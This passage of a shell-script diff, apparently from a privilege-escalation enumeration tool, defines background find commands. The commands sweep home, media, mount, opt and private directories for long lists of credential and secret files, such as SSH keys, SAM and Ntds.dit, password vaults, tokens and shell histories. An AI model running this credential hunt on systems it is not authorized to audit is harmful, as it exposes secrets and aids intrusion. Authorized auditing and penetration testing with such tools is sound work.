\"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \"ssh*config\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find /lib -name \"log4j-core*.jar\" -o -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" -o -name \"rocketchat.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"log4j-core*.jar\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"log4j-core*.jar\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"sess_*\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"*.pem\" -o -name \"KeePass.config*\" -o -name \"ftp.config\" -o -name \"TokenCache.dat\" -o -name \".k5login\" -o -name \"*.viminfo\" -o -name \"anaconda-ks.cfg\" -o -name \"NetSetup.log\" -o -name \"*vnc*.ini\" -o -name \"*config*.php\" -o -name \"protecteduserkey.bin\" -o -name \"ddclient.conf\" -o -name \"Ntds.dit\" -o -name \"drives.xml\" -o -name \"sentry.conf.py\" -o -name \"*.db\" -o -name \"sysprep.xml\" -o -name \"SYSTEM\" -o -name \"*.csr\" -o -name \"redis.conf\" -o -name \"jetty-realm.properties\" -o -name \"AppEvent.Evt\" -o -name \"*.keystore\" -o -name \"ftp.ini\" -o -name \"my.ini\" -o -name \"gitlab.rm\" -o -name \"autologin\" -o -name \"Dockerfile\" -o -name \"*.socket\" -o -name \"ipsec.conf\" -o -name \"error.log\" -o -name \"access_tokens.db\" -o -name \"elasticsearch.y*ml\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"kcpassword\" -o -name \"*.keyring\" -o -name \"snmpd.conf\" -o -name \"id_rsa*\" -o -name \"*password*\" -o -name \"setupinfo.bak\" -o -name \"default.sav\" -o -name \".git\" -o -name \"kibana.y*ml\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \".profile\" -o -name \"KeePass.enforced*\" -o -name \"*vnc*.c*nf*\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".erlang.cookie\" -o -name \"postgresql.conf\" -o -name \"*.p12\" -o -name \"unattend.txt\" -o -name \"ipsec.secrets\" -o -name \"config.php\" -o -name \".sudo_as_admin_successful\" -o -name \"*.psk\" -o -name \"zabbix_agentd.conf\" -o -name \"passbolt.php\" -o -name \"RDCMan.settings\" -o -name \".rhosts\" -o -name \".lesshst\" -o -name \"hostapd.conf\" -o -name \"supervisord.conf\" -o -name \"secrets.yml\" -o -name \"docker.socket\" -o -name \"cesi.conf\" -o -name \"log4j-core*.jar\" -o -name \"rsyncd.secrets\" -o -name \"groups.xml\" -o -name \"https.conf\" -o -name \"scclient.exe\" -o -name \"krb5.conf\" -o -name \"*.swp\" -o -name \"mongod*.conf\" -o -name \"azureProfile.json\" -o -name \"*.pgp\" -o -name \"unattend.xml\" -o -name \"*.der\" -o -name \"000-default.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"web*.config\" -o -name \"hosts.equiv\" -o -name \"authorized_hosts\" -o -name \".htpasswd\" -o -name \"pgadmin*.db\" -o -name \"*.sqlite3\" -o -name \"php.ini\" -o -name \"index.dat\" -o -name \"access.log\" -o -name \"https-xampp.conf\" -o -name \"AzureRMContext.json\" -o -name \"access_tokens.json\" -o -name \"rsyncd.conf\" -o -name \"*.timer\" -o -name \"agent*\" -o -name \"mosquitto.conf\" -o -name \".env\" -o -name \"*.key\" -o -name \"my.cnf\" -o -name \"*.rdg\" -o -name \"system.sav\" -o -name \"zabbix_server.conf\" -o -name \"FreeSSHDservice.ini\" -o -name \"sitemanager.xml\" -o -name \"*.cer\" -o -name \"passwd\" -o -name \"software\" -o -name \"*.kdbx\" -o -name \"rocketchat.service\" -o -name \"sysprep.inf\" -o -name \"settings.php\" -o -name \"*.gpg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"database.php\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"gvm-tools.conf\" -o -name \"ffftp.ini\" -o -name \"recentservers.xml\" -o -name \"unattended.xml\" -o -name \"backup\" -o -name \"racoon.conf\" -o -name \"sites.ini\" -o -name \"scheduledtasks.xml\" -o -name \".plan\" -o -name \"*.crt\" -o -name \"cloud.cfg\" -o -name \"legacy_credentials.db\" -o -name \"credentials.db\" -o -name \".msmtprc\" -o -name \"kadm5.acl\" -o -name \"storage.php\" -o -name \"setupinfo\" -o -name \"*.ovpn\" -o -name \"*.service\" -o -name \"autologin.conf\" -o -name \".bashrc\" -o -name \".vault-token\" -o -name \"*.ftpconfig\" -o -name \"id_dsa*\" -o -name \"bash.exe\" -o -name \"security.sav\" -o -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"creds*\" -o -name \"iis6.log\" -o -name \".ldaprc\" -o -name \"server.xml\" -o -name \"wsl.exe\" -o -name \"pagefile.sys\" -o -name \"backups\" -o -name \"*.jks\" -o -name \"mariadb.cnf\" -o -name \".pypirc\" -o -name \"SAM\" -o -name \"appcmd.exe\" -o -name \"unattend.inf\" -o -name \"*.gnupg\" -o -name \"ws_ftp.ini\" -o -name \"sssd.conf\" -o -name \"*.pfx\" -o -name \"db.php\" -o -name \"*_history*\" -o -name \"ntuser.dat\" -o -name \"ConsoleHost_history.txt\" -o -name \"gitlab.yml\" -o -name \"filezilla.xml\" -o -name \"winscp.ini\" -o -name \"krb5.keytab\" -o -name \"pgsql.conf\" -o -name \"httpd.conf\" -o -name \"authorized_keys\" -o -name \".google_authenticator\" -o -name \"software.sav\" -o -name \"wp-config.php\" -o -name \"credentials\" -o -name \"vault-ssh-helper.hcl\" -o -name \"tomcat-users.xml\" -o -name \".github\" -o -name \".wgetrc\" -o -name \"*vnc*.xml\" -o -name \"*credential*\" -o -name \".recently-used.xbel\" -o -name \"accessTokens.json\" -o -name \"psk.txt\" -o -name \".git-credentials\" -o -name \".secrets.mkey\" -o -name \"sess_*\" -o -name \"secrets.ldb\" -o -name \"debian.cnf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"ldap\" -o -name \"postfix\" -o -name \".vnc\" -o -name \".cloudflared\" -o -name \"environments\" -o -name \"keyrings\" -o -name \"filezilla\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"cacti\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"zabbix\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \".password-store\" -o -name \"sentry\" -o -name \"mysql\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find 